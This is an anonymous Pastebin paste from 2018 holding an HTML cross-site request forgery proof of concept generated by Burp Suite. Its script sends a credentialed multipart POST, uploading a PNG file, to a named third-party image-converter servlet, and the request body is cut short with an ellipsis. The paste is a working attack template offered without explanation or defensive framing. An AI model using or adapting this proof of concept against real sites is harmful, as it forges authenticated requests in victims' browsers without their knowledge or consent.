daily pastebin goal
38%
SHARE
TWEET

Untitled

a guest Sep 14th, 2018 52 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2.   <!-- CSRF PoC - generated by Burp Suite Professional -->
  3.   <body>
  4.   <script>history.pushState('', '', '/')</script>
  5.     <script>
  6.       function submitRequest()
  7.       {
  8.         var xhr = new XMLHttpRequest();
  9.         xhr.open("POST", "https:\/\/www.online-utility.org\/servlet\/ImageConverter", true);
  10.         xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  11.         xhr.setRequestHeader("Accept-Language", "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3");
  12.         xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------206860758214748693911873600863");
  13.         xhr.withCredentials = true;
  14.         var body = "-----------------------------206860758214748693911873600863\r\n" +
  15.           "Content-Disposition: form-data; name=\"fname\"; filename=\"Logo_sstic_transp.png\"\r\n" +
  16.           "Content-Type: image/png\r\n" +
  17.           "\r\n" +
  18.           "\x89PNG\r\n" +
  19. ....
  20.           "-----------------------------206860758214748693911873600863--\r\n";
  21.         var aBody = new Uint8Array(body.length);
  22.         for (var i = 0; i < aBody.length; i++)
  23.           aBody[i] = body.charCodeAt(i);
  24.         xhr.send(new Blob([aBody]));
  25.       }
  26.     </script>
  27.     <form action="#">
  28.       <input type="button" value="Submit request" onclick="submitRequest();" />
  29.     </form>
  30.   </body>
  31. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top